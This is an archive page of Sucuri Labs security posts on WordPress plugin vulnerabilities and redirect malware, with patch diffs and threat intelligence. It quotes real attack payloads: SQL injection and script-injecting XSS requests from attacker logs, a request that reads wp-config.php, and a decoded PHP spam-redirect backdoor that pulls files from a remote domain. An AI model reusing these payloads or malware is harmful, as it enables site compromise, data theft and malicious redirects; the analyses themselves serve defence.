Redirects Archives - Sucuri Labs

Vulnerable Plugins: June 2020 Update

This is a mid-month update to our regular Monthly Vulnerability Digest, which reveals a number of new patches for disclosed vulnerabilities.

Plugin	Vulnerability	Patched Version	Installs
Elementor Page Builder	Authenticated Stored XSS	2.9.10	5000000
AdRotate	Authenticated SQL Injection	5.8.4	40000
Brizy - Page Builder	Improper Access Controls	1.0.126	60000
Careerfy	Unauthenticated XSS	3.9.0	5000
SportsPress	Authenticated Stored XSS	2.7.2	20000
JobSearch	Unauthenticated XSS	1.5.1	5000
Newspaper	Unauthenticated XSS	10.3.4	6000
Multi Scheduler	Record Deletion CSRF	--	20

Highlights

Cross-site scripting is the most common vulnerability in WordPress plugins
None of these plugins have been identified in massive attacks

Relevant Plugins

SportsPress

Sportspress fixed an authenticated stored cross-site scripting vulnerability in version 2.7.2. This vulnerability allows authenticated attackers to arbitrarily update the “sportspress_event_teams_delimiter” plugin option, allowing for the potential execution of malicious scripts every time the site is loaded.

Since this bug is really easy for attackers to exploit in malware campaigns, we’ve been following it closely but haven’t detected any massive abuses as an attack vector. We believe this is primarily due to the fact that the vulnerability exploit requires access to a compromised user within the vulnerable site.

Patch:

Index: sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
===================================================================
--- a/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php
+++ b/sportspress/tags/2.7.2/includes/admin/settings/class-sp-settings-events.php         
         if ( isset( $_POST['sportspress_event_teams_delimiter'] ) )
-            update_option( 'sportspress_event_teams_delimiter', $_POST['sportspress_event_teams_delimiter'] );
+            update_option( 'sportspress_event_teams_delimiter', sanitize_text_field( $_POST['sportspress_event_teams_delimiter'] ) );
 }

AdRotate

Adrotate fixed an authenticated SQL Injection in version 5.8.4. We haven’t detected any massive automated attacks targeting this plugin.

Patch:

    if(isset($_GET['status'])) $status = esc_attr($_GET['status']);
     if(isset($_GET['view'])) $view = esc_attr($_GET['view']);
     if(isset($_GET['id'])) $id = esc_attr($_GET['id']);
     if(isset($_GET['file'])) $file = esc_attr($_GET['file']);
+
+    if(!is_numeric($status)) $status = 0;
+    if(!is_numeric($id)) $id = 0;

The majority of the public vulnerabilities in this mid-month update require the possession of a user account within the vulnerable site, which reduces the odds of any massive infections.

That being said, to mitigate risk from these recently patched vulnerabilities we strongly encourage all affected users to update their plugins as soon as possible.

Jun 19, 2020 by John Castro

Vulnerabilities Digest: May 2020

Relevant Plugins and Vulnerabilities:

Plugin	Vulnerability	Patched Version	Installs
WP Product Review	Unauthenticated Stored XSS	3.7.6	40000
Form Maker by 10Web	Authenticated SQL Injection	---	100000
Add-on SweetAlert Contact Form 7	Authenticated XSS	1.0.8	20
Paid Memberships Pro	Authenticated SQL Injection	2.3.3	90000
Visual Composer	Authenticated XSS	27	80000
Team Members	Authenticated XSS	5.0.4	40000
Photo Gallery by 10Web	Unauthenticated SQL Injection	1.5.55	300000
Login/Signup Popup	Authenticated XSS	1.5	10000
Easy Testimonials	Authenticated Stored XSS	3.6	30000
WooCommerce	Unescaped Metadata	4.1.0	5000000
Page Builder by SiteOrigin	CSRF to XSS	2.10.16	1000000
Chopslider	Authenticated SQL Injection	---	200
Elementor Pro	Authenticated File Upload	2.9.4	100000
LearnPress	Privilege Escalation	3.2.6.9	80000
Elementor	Authenticated Stored XSS	2.9.8	4000000
Avada	Authenticated Stored XSS	6.2.3	500000
Ninja Forms	CSRF to Stored XSS	3.4.24.2	1000000
Advanced Order Export For Woo	Authenticated XSS	3.1.4	90000
Quick Page/Post redirect	Authenticated Settings Update	---	100000
Ultimate Addons for Elementor	Registration Bypass	1.24.2	100000
WTI Like Post	Authenticated XSS	---	10000
WP-Advanced-Search	Authenticated SQL Injection	3.3.7	1000
Gmedia Photo Gallery	Authenticated XSS	1.18.5	10000

Highlights for May 2020

Cross site scripting is still the most prevalent vulnerability. Bad actors are taking advantage of the lack of restrictions in critical functions and issues surrounding user input data sanitization.
Unprotected AJAX action bugs are still on the rise. Attackers aren’t hesitating to automate malicious injections for vulnerable plugins.
Attackers have added three plugins and a series of new malicious IPs to their arsenal in an ongoing massive malware campaign targeting WordPress websites with known vulnerabilities.

Details for these highlights can be found under the components listed below.

WP Product Review

Two weeks ago, we reported an Unauthenticated Stored Cross Site Scripting in WP Product Review caused by a lack of protection in a rest route definition and improper handling of user input.

Only a few days after the disclosure of this vulnerability, attackers began to scan for vulnerable sites:

181.58.21.65 - - [18/May/2020:17:21:10 +0000] "GET //wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

139.198.16.241 - - [18/May/2020:17:15:36 +0000] "GET //wp-content/plugins/wp-product-review/readme.txt HTTP/1.1" 

185.162.127.248 - - [17/May/2020:03:38:15 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1" 

213.159.210.170 - - [17/May/2020:01:35:04 +0000] "GET /wp-content/plugins/wp-product-review/assets/js/main.js HTTP/1.1"

Patch (version 3.7.6):

Index: wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
===================================================================
--- a/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
+++ b/wp-product-review/trunk/includes/gutenberg/class-wppr-gutenberg.php
@@ -97,4 +97,7 @@
                 'methods'  => 'POST',
                 'callback' => array( $this, 'update_review_callback' ),
+                'permission_callback' => function () {
+                    return current_user_can( 'edit_posts' );
+                },
                 'args'     => array(
                     'id' => array(

---

Index: wp-product-review/trunk/includes/functions.php
===================================================================
--- a/wp-product-review/trunk/includes/functions.php
+++ b/wp-product-review/trunk/includes/functions.php
@@ -229,5 +229,5 @@
         }
         ?>
-        <a title="<?php echo $review_object->get_name(); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
+        <a title="<?php echo esc_attr( $review_object->get_name() ); ?>" class="<?php echo $class_a; ?>" href="<?php echo esc_url( $image_link ); ?>" <?php echo $lightbox; ?> rel="nofollow" target="_blank">
             <img
                 src="<?php echo esc_attr( $src ); ?>"

Elementor

Earlier this month, the plugin Elementor Pro fixed an arbitrary file upload vulnerability caused by an unprotected Ajax hook. It wasn’t long before attackers started exploiting this vulnerability.

Our team identified these malicious IPs trying to detect plugin installations for both Elementor Pro and Ultimate Addons for Elementor:

69.164.207.140 - - [08/May/2020:15:59:31 +0000] "GET /wp-content/plugins/elementor-pro/assets/js/preview.min.js HTTP/1.1" 

45.79.193.100 - - [08/May/2020:16:49:13 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/css/modules/business-hours.css HTTP/1.1" 

62.210.172.66 - - [10/May/2020:02:33:29 +0000] "GET /wp-content/plugins/ultimate-elementor/assets/min-js/uael-registration.min.js HTTP/1.1" 

62.210.84.69 - - [13/May/2020:08:13:57 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

62.210.172.66 - - [13/May/2020:08:21:05 +0000] "GET /wp-content/plugins/elementor-pro/assets/css/frontend.min.css HTTP/1.1" 

[...]

Photo Gallery by 10Web

An unauthenticated SQL Injection was fixed this month in the plugin Photo Gallery.

Patch (version 1.5.55):

Index: photo-gallery/trunk/frontend/models/model.php
===================================================================
--- a/photo-gallery/trunk/frontend/models/model.php
+++ b/photo-gallery/trunk/frontend/models/model.php
@@ -197,32 +197,32 @@

   public function get_alb_gals_row( $bwg, $id, $albums_per_page, $sort_by, $order_by, $pagination_type = 0, $from = '' ) {
-    if ( $albums_per_page < 0 ) {
+    if ( $albums_per_page < 0 ) {
       $albums_per_page = 0;
     }
     global $wpdb;
-    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span><span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span>$from<span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span><span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
-    if( $sort_by == 'random' || $sort_by == 'RAND()' ) {
-      $order_by = 'ORDER BY RAND()';
-    }
-    $search_where = '';
-    $search_value = trim( WDWLibrary::get('bwg_search_' . $bwg) );
-    if ( !empty($search_value) ) {
-      $search_keys = explode(' ', $search_value);
+    $order_by = 'ORDER BY </span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>.</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>(</span> <span style='color:#d2cd86; '>!</span>empty<span style='color:#d2cd86; '>(</span> $from <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>&&</span> $from <span style='color:#d2cd86; '>===</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>widget</span><span style='color:#02d045; '>'</span> <span style='color:#d2cd86; '>)</span> <span style='color:#b060b0; '>?</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '>id</span><span style='color:#02d045; '>'</span> <span style='color:#b060b0; '>:</span> $sort_by <span style='color:#d2cd86; '>)</span> <span style='color:#d2cd86; '>.</span> <span style='color:#02d045; '>'</span><span style='color:#00c4c4; '> ' . $order_by;
+    if ( $sort_by == 'random' || $sort_by == 'RAND()' ) {
+      $order_by = 'ORDER BY RAND()';
+    }
+    $search_where = '';
+    $search_value = trim( WDWLibrary::get( 'bwg_search_' . $bwg ) );
+    if ( !empty( $search_value ) ) {
+      $search_keys = explode( ' ', $search_value );
       $alt_search = '(';
       $description_search = '(';

Payload Used by Attackers:

185.162.127.248 -- POST -- /wp-admin/admin-ajax.php -- action=bwg_frontend_data&bwg_search_0=1%23+%25DFGDFG%22%29%29%2F%2A%2A%2FUNION%2F%2A%2A%2FALL%2F%2A%2A%2FSELECT%2F%2A%2A%2FTABLE_SCHEMA%2CTABLE_NAME%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2C%27%27%2F%2A%2A%2Fas%2F%2A%2A%2Fdummy_3%2F%2A%2A%2Ffrom%2F%2A%2A%2Finformation_schema.tables%23FGDFGDFG%29%29%23&gallery_type=album_compact_preview&type_0=album -- 2020-05-17

Plugin & Theme Payloads Added to Ongoing Campaign

Malicious Domains & Detected IPs

Our team saw the following new malicious domains injected into an ongoing campaign exploiting known WordPress vulnerabilities this month:

css[.]digestcolect[.]com
cls[.]balantfromsun[.]com
count[.]trackstatisticsss[.]com

The following IPs have also been associated with this campaign:

79.133.202.70
154.43.128.23
185.162.127.248
51.83.70.152
213.159.210.170
139.162.28.41
139.99.169.192
185.217.0.224
84.238.108.177
62.210.180.8
[...]

Exploit Attempts Seen in the Wild

Our team identified attacks against the following vulnerable plugins and themes.

Bold Page Builder (From Last Year)

139.162.28.41 -- POST -- /wp-admin/admin-ajax.php?action=bt_bb_set_custom_css -- css=%3C%2Fstyle%3E%3Cscript++type%3Dtext%2Fjavascript+language%3Djavascript%3Eeval%28String.fromCharCode%2832%2C40%2C102%2C117%2C110%2C99%2C116%2C105%2C111%2C110%2C40%2C41%2C32%2C123%2C10%2C32%2C32%2C32%2C32%2C118%2C97%2C114%2C32%2C101%2C108%2C101%2C109%2C32%2C61%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C99%2C114%2C101%2C97%2C116%2C101%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C40%2C39%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C41%2C59%2C32%2C10%2C9%2C101%2C108%2C101%2C109%2C46%2C116%2C121%2C112%2C101%2C32%2C61%2C32%2C39%2C116%2C101%2C120%2C116%2C47%2C106%2C97%2C118%2C97%2C115%2C99%2C114%2C105%2C112%2C116%2C39%2C59%2C32%2C10%2C32%2C32%2C32%2C32%2C101%2C108%2C101%2C109%2C46%2C115%2C114%2C99%2C32%2C61%2C32%2C39%2C104%2C116%2C116%2C112%2C115%2C58%2C47%2C47%2C99%2C108%2C115%2C46%2C98%2C97%2C108%2C97%2C110%2C116%2C102%2C114%2C111%2C109%2C115%2C117%2C110%2C46%2C99%2C111%2C109%2C47%2C99%2C108%2C115%2C46%2C106%2C115%2C63%2C122%2C61%2C54%2C38%2C39%2C59%2C10%2C32%2C32%2C32%2C32%2C100%2C111%2C99%2C117%2C109%2C101%2C110%2C116%2C46%2C103%2C101%2C116%2C69%2C108%2C101%2C109%2C101%2C110%2C116%2C115%2C66%2C121%2C84%2C97%2C103%2C78%2C97%2C109%2C101%2C40%2C34%2C104%2C101%2C97%2C100%2C34%2C41%2C91%2C48%2C93%2C46%2C97%2C112%2C112%2C101%2C110%2C100%2C67%2C104%2C105%2C108%2C100%2C40%2C101%2C108%2C101%2C109%2C41%2C59%2C10%2C32%2C32%2C125%2C41%2C40%2C41%2C59%29%29%3B%3C%2Fscript%3E%3Cstyle%3E&post_id=1 -- 2020-05-12

WP Quick Booking Manager (from 4 years ago)

139.162.28.41 - action=gen_save_cssfixfront&css=%3C%2Fstyle%3E%3Cscript+type%3D%27text%2Fjavascript%27+src%3D%27https%3A%2F%2Fcss.digestcolect.com%2Fstm%3Fv%3Dl6.0.0%27%3E%3C%2Fscript%3E%3Cstyle%3E&cssfix=front [12/May/2020:04:52:19 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1"

Duplicator Download

62.210.180.8 - - [14/May/2020:14:45:54 +0000] "GET /wp-admin/admin-ajax.php?action=duplicator_download&file=../wp-config.php HTTP/1.1"

Many other plugins are still under attack and public exploits already exist for all of the components listed above. Please check our previous lab notes for more information about this ongoing WordPress Malware campaign.

To mitigate threat, we strongly encourage you to keep your software up to date to prevent infection and mitigate risk to your environment. Websites behind the Sucuri Firewall are protected against these exploits.

May 29, 2020 by John Castro

Face Mask Spam Links Injected in WordPress Database

During a recent malware removal request, we found a compromised WordPress site being used to redirect to spam websites. The campaign was leveraging an increase in search queries related to face masks.

To make their campaign more difficult to detect and boost SEO rankings, the attackers use a multitude of compromised third-party websites to funnel their traffic. They also use the World Health Organization name and images to add credibility to their campaign.

Spam links are injected into the widgets section of the wp_options database, resulting in the compromised environment linking to third-party sites trying to rank for face mask search terms.

The spam links have been set to conceal themselves from website visitors using <div style="display:none;">, all of which lead to the Shopify website https://lundybright[.]fr/ which was registered on March 2nd.

Compromised websites impacted by this spam campaign can use our hacked website cleanup guide to remove the infection.

Apr 2, 2020 by Luke Leal

web.config redirect malware

We recently found this malware on a windows hosting server where the web.config file was modified with the following code:

The code redirects multiple user agents and users referred from Google,Yahoo, MSN etc. to conceit-gleaned.php
The file conceit-gleaned.php contains the malware that is encoded to avoid detection, but we were able to reverse it and pull the plain text code.The malware communicates with the website gettheseorders[dot]ru in order to redirect users to the page they want. In this case, it redirected to Viagra-related pages but it could be anything in the future.

This is the malware added to the file conceit-gleaned.php:

<?php $ZdcIihIC="bSh8gtxCo6JlYQiK4AkwdIDe_VnN7OTfFr3sPZHaG291jRUqmcvXMzEy50puLWB";$wHnnxSifPdjM=$ZdcIihIC[0].
 $ZdcIihIC[39] . $ZdcIihIC[35] . $ZdcIihIC[23]. $ZdcIihIC[9] .$ZdcIihIC[16] . $ZdcIihIC[24]. $ZdcIihIC[20] .
 $ZdcIihIC[23]. $ZdcIihIC[49].$ZdcIihIC[8].$ZdcIihIC[20] .$ZdcIihIC[23];$cQBlOMOpUwc=$ZdcIihIC[4].$ZdcIihIC[53] .
 $ZdcIihIC[14].$ZdcIihIC[26] .$ZdcIihIC[31] .$ZdcIihIC[11] . $ZdcIihIC[39] .$ZdcIihIC[5]. $ZdcIihIC[23];
 $bHUDmvkyJ=$ZdcIihIC[23]. $ZdcIihIC[33].$ZdcIihIC[33] . $ZdcIihIC[8] .$ZdcIihIC[33] .$ZdcIihIC[24] .
  $ZdcIihIC[33] .$ZdcIihIC[23]. $ZdcIihIC[58] .$ZdcIihIC[8]. $ZdcIihIC[33] .$ZdcIihIC[5].$ZdcIihIC[14]. 
  $ZdcIihIC[26] .$ZdcIihIC[4];$cBpAXxrcExTv=$ZdcIihIC[49].$ZdcIihIC[33]. $ZdcIihIC[23] . $ZdcIihIC[39].
   $ZdcIihIC[5]. $ZdcIihIC[23].$ZdcIihIC[24]. $ZdcIihIC[31]. $ZdcIihIC[59]. $ZdcIihIC[26].$ZdcIihIC[49]. 
   $ZdcIihIC[5]. $ZdcIihIC[14]. $ZdcIihIC[8] . $ZdcIihIC[26];$bHUDmvkyJ(0);
   $jOfMRiAkmjE=$cBpAXxrcExTv("",$cQBlOMOpUwc($wHnnxSifPdjM("vRhrU9u49nM6w3/wut5i36ZOwqPbKZjClrRlymtDaOfewngUWyFa/
(edited) 
BD00Jz7anEV+JKgEXX5qhb3XF/5/AA==")));$jOfMRiAkmjE();?>

We were able to reverse it and this is the code that causes the redirect:

Here is the full script after we decoded it:

set_time_limit(0);
function change_page_regex($page, $links,$reg,$res){
$elements = array(); if (preg_match_all($reg, $page, $result)) { 
$elements = $result[$res]; $elements = array_unique($elements);
$m=min(count($links),count($elements));
for ($i = 0; $i < $m; $i++) { $link = array_shift($links); $element = array_shift($elements); $page = preg_replace('/' . preg_quote($element, '/') . '/', '$0 ' . $link, $page, 1); } if (count($links)>0){ $element = "<p>"; $element .= implode("<br>\n", $links); $element .= "</p>"; $page = preg_replace('/\<\/body\>/i', "\n" . $element . "\n$0", $page, 1); return $page;}
function curly_page_get($url,$useragent="Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36"){ $ch = curl_init (); curl_setopt ($ch, CURLOPT_URL,$url); curl_setopt ($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt ($ch, CURLOPT_TIMEOUT, 3000); curl_setopt ($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt ($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt ($ch, CURLOPT_USERAGENT, $useragent); $result = curl_exec ($ch); $curly_page_get_info=curl_getinfo($ch);
curl_close($ch); return array($result,$curly_page_get_info);}
function get_proxy_page(){ $proto=stripos(@$_SERVER['SERVER_PROTOCOL'],'https') === true ? 'https://' : 'http://'; $crurl=$proto.@$_SERVER['HTTP_HOST'].@$_SERVER['REQUEST_URI']; list($buf,$curly_page_get_info)=curly_page_get($crurl);
$ct=@$curly_page_get_info['content_type']; $nexturl=@$curly_page_get_info['redirect_url']; $status=@$curly_page_get_info['http_code']; if (status!="")header("Status: $status");
if ($ct!=""){ header("Content-type: $ct"); if ($nexturl!=""){ header("Location: $nexturl"); return array($buf,$ct);
}
if (function_exists('sys_get_temp_dir')) {$tmppath = sys_get_temp_dir();if (!is_dir($tmppath)){ $tmppath = (dirname(__FILE__)); } } else { $tmppath = (dirname(__FILE__));}
$content="";$x=@$_POST["pppp_check"];$md5pass="e5e4570182820af0a183ce1520afe43b";
$host=@$_SERVER["HTTP_HOST"];$uri=@$_SERVER["REQUEST_URI"];$host=str_replace("www.","",$host);$md5host=md5($host);$urx=$host.$uri;$md5urx=md5($urx);
$tmppath=$tmppath."/.".$md5host."/";@mkdir($tmppath);
$configs=$tmppath."emoji1.png";$bd=$tmppath."metaicons.jpg";$templ=$tmppath."wp-themesall.gif";
$domain=base64_decode("Z2V0dGhlc2VvcmRlcnMucnU=");$p=md5(base64_decode(@$_POST["p"]));
if (($x!="")&&($p==$md5pass)){
if ($x=="2"){ echo "###UPDATING_FILES###\n"; list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/emoji1.png"); @file_put_contents($configs,$buf1); list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/metaicons.jpg"); @file_put_contents($bd,$buf1); list($buf1,$curly_page_get_info)=@curly_page_get("http://update.".$domain."/images/".$md5host."/wp-themesall.gif"); @file_put_contents($templ,$buf1);
exit; 
 if ($x=="4"){ echo "###WORKED###\n";exit; 
 }else{
$cf=array(); if (@file_exists($configs)){ $cf=@unserialize(@base64_decode(@file_get_contents($configs))); if (@isset($cf[$md5urx])){ $bot=0;$se=0;$ua=@$_SERVER["HTTP_USER_AGENT"];$ref=@$_SERVER["HTTP_REFERER"];$myip=@$_SERVER["REMOTE_ADDR"]; if (preg_match("#google|bing\.com|msn\.com|ask\.com|aol\.com|altavista|search|yahoo|conduit\.com|charter\.net|wow\.com|mywebsearch\.com|handycafe\.com|babylon\.com#i", $ref))$se=1; if (preg_match("#google|gsa-crawler|AdsBot-Google|Mediapartners|Googlebot-Mobile|spider|bot|yahoo|google web preview|mail\.ru|crawler|baiduspider#i", $ua))$bot=1; $off=$cf[$md5urx]+0; $template=@base64_decode(@file_get_contents($templ));$f=@fopen($bd,"r");@fseek($f,$off);$buf=trim(@fgets($f,10000000));@fclose($f);$info=unserialize(base64_decode($buf)); $keyword=@$info["keyword"];$IDpack=@$info["IDpack"];$base=@$info["base"];$text=@$info["text"];$title=@$info["title"];$description=@$info["description"];$uckeyword=ucwords($keyword);$inside_links=@$info["inside_links"]; if ($bot) { if (isset($info["contenttype"])){$contenttype=@base64_decode($info["contenttype"]);$types=explode("\n",$contenttype);foreach($types as $val){$val=trim($val);if($val!="")header($val);}}
if (isset($info["isdoor"])){
if (isset($info["standalone"])){ $doorcontent=base64_decode($text); echo $doorcontent;exit; }else{ $template=str_replace("%text%",$text,$template); $template=str_replace("%title%",$title,$template); $template=str_replace("%description%",$description,$template); $template=str_replace("%uckeyword%",$uckeyword,$template); $template=str_replace("%keyword%",str_replace(" ", ",", trim($keyword)),$template);
foreach($inside_links as $i => $link){ $template=str_replace("%INSIDE_LINK_".$i."%",$link,$template); }
echo $template;exit; } }else{
list($buf,$ct)=get_proxy_page();
if (stristr($ct,"text/html")){ $rega='/\<a\s.*?\>.*?\<\/a\>/i';$resa=0; $links=$info["links_a"]; $buf=change_page_regex($buf,$links,$rega,$resa);
$regp='/(.{30}\<\/p\>)/is';$resp=1; $links=$info["links_p"]; $buf=change_page_regex($buf,$links,$regp,$resp);
}
echo $buf; }
} if ($se) { if (isset($info["isdoor"])){ list($buf1,$curly_page_get_info)=curly_page_get("http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua); echo $buf1;exit; }else{ list($buf,$ct)=get_proxy_page(); echo $buf;exit; } } }else{
list($buf,$ct)=get_proxy_page(); echo $buf; 
}

You can see here that different data is recorded. By providing only the first two variables, we were still redirected to a spam site:

http://$domain/ff.php?ip=".$IDpack."&mk=".rawurlencode($keyword)."&base=".rawurlencode($base)."&d=".rawurlencode($host)."&u=".rawurlencode($urx)."&addr=".$myip."&ref=".rawurlencode($ref),$ua);
hxxp://gettheseorders[dot]ru/ff.php?ip=12423&mk=test

I was able to get redirected to the following spam/scam sites:

an-order-shop[dot]comalltabsstorekeys[dot]com

In this case, the web.config file was used to facilitate this redirect, as this was a Windows hosting environment, but it can easily be adopted to work under Linux. We recommend checking the .htaccess file or the web.config file if you are dealing with a similar problem. Also removing the malicious files; the path to them can be found in the configuration files I previously mentioned.

Jun 26, 2019 by Krasimir Konov

Fake relatable domain used to distribute ads

Malicious users try to hide their malicious scripts in many ways these days, some more clever then others, in this case we look at a domain which looks like GoogleADS[.]com but it's actually GoogleADSL[.]com, this was done to make the domain look more legitimate and fool users into thinking the website is just loading Google ads. We found the domain to be used to redirect redirect users via fake jquery.js request.

The domain googleadsl.com appears to be registered by somebody in China and is being used to distribute the malicious ads.

Domain Name:googleadsl.com
Registry Domain ID:1650621483_domain_com-vrsn
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:hxxp://www.xinnet.com
Creation Date:2011-04-13T04:43:52.00Z

Here is the malicious code we found, you can see that it was hex encoded so that its hard to detect and analyze:

< Script language="javascript">
<!--
window["\x64\x6f\x63\x75\x6d\x65\x6e\x74"]["\x77\x72\x69\x74\x65"] ('\x3c\x53\x43\x52\x49\x50\x54 \x73\x72\x63\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x67\x6f\x6f\x67\x6c\x65\x61\x64\x73\x6c\x2e\x63\x6f\x6d\x2f\x73\x70\x63\x6f\x64\x65\x2f\x6a\x71\x75\x65\x72\x79\x2e\x6a\x73\x22\x3e\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e');
-->
</Script>

Decoded:

window["document"]["write"] ('<SCRIPT src="hxxp://www.googleadsl.com/spcode/jquery.js"></script>');

The above code redirects to 106hk.com:

curl --compressed -sD - -L -e "hxxp://randomsite.com" -A "Chrome 56" "hxxp://www.googleadsl.com/spcode/jquery.js"
HTTP/1.1 302 Redirect
Content-Length: 176
Content-Type: text/html
Location: hxxp://www.106hk.com/huodong/application/core/ajax.js

Here is the code returned after the redirect here:

hxxp://www.106hk.com/huodong/application/core/ajax.js

Content:

var cookieString = document.cookie;
var start = cookieString.indexOf("cookiesleep");
if(start!=-1){}else{
    var expires=new Date();
    expires.setTime(expires.getTime()+6*60*60*1000);
    document.cookie="cookiesleep=test;expires="+expires.toGMTString();
    var u = navigator.userAgent;
    if(u.indexOf('Android') > -1 || u.indexOf('Adr') > -1 ){
     window.location.href="hxxp://www.ncjkedu.com/3G/ads.html";
    }else{
     document.write('<script src="hxxp://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/layer/layer.js"></script>');
     document.write('<script src="hxxp://www.106hk.com/huodong/application/core/ad.js"></script>');
    }
}

We found both of these to be porn ads:

hxxp://www.106hk.com/huodong/application/core/ad.js
hxxp://www.ncjkedu.com/3G/ads.html

Users should be vigilant and look for any content trying to load from suspicious domains, in this case almost all files were infected with the malicious code and we found the website making requests for googleadsl.com but this domain can change.

Apr 26, 2019 by Krasimir Konov

Defunct Malware Can Cause Problems Too

Recently our incident response analyst Harshad Mane worked on a site that redirected users to a third-party malicious site whenever they logged into the WordPress admin interface.

We found the culprit in the functions.php file of the active theme.

if ( get_current_user_id() != '1130') {
   header("Location: hxxps://photoscape[.]ch/Setup.exe");
}

This code checks the Id of the current WordPress user and redirects them (if their Id is not 1130) to download a malicious Setup.exe file.

The functions.php file wasn’t the only infected file. We also removed many backdoors and a script that hid rogue admin users in the User’s list in the WordPress dashboard.

This campaign was active about a year ago. Since then the domain name has expired and the site owners spotted and deleted the rogue admin user with Id 1130. However, the annoying redirect persisted and even caused blacklisting of the site by some antiviruses, so the site owners requested us to clean their site.

Apr 18, 2019 by Harshad Mane

Thousands of Redirecting Files

We recently cleaned a site where we found thousands of malicious files with the following content:

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://realprofit[.]su/" ) ;
?>

and

<?php
header ( "HTTP/1.1 301 Moved Permanently" ) ;
header ( "Location: hxxp://profitnow[.]su/" ) ;
?>

All files were located in the site root directory and had names derived from a person's first names: mccarphy.php, viva.php, lotta.php, sang.php, trine.php, liviu.php, taylar.php, golden.php, staphane, stanislav.php, ismail.php, jerusha.php, menda.php, niel.php, samaira.php, kaa.php, franky.php etc.

Most likely these files are used in an email malware campaign. We found an analysis of one malicious .doc file that made requests to several domains, including realprofit[.]su, and then saved the response as an .exe file and executed it.

This particular wave of the attack is known to infect many sites. Profitnow[.]su was created on November 28, 2018, and according to RiskIQ, 700+ sites redirected there. Realprofit[.]su was created on December 6, 2018, and 500+ sites redirected there.

Some other domains used in this malware campaign:

out36.selfsend.ru
to5.topwenches[.]com
trybestsale[.]su
onlinehotprice[.]su
saleallshop[.]su
bestshopmaster[.]su

Apr 17, 2019 by Denis Sinegubko